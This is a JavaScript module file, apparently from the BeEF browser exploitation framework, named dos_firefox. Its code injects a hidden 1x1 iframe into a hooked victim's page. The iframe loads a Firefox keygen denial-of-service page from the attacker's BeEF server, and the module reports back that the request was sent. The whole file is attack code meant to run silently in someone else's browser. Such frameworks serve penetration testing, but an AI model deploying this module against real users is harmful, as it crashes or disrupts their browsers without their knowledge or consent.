Files
beef/modules/browser/dos_firefox/template.js
wade@bindshell.net 03ffb4703d Initial Import
git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2010-01-11 00:54:08 +00:00

12 lines
374 B
JavaScript

function do_main(){
var iframe = document.createElement('iframe');
iframe.src = beef_url + 'modules/symmetric/xplt_firefox_dos/ffkeygendos.html';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Request Sent";
}
return_result(result_id, do_main());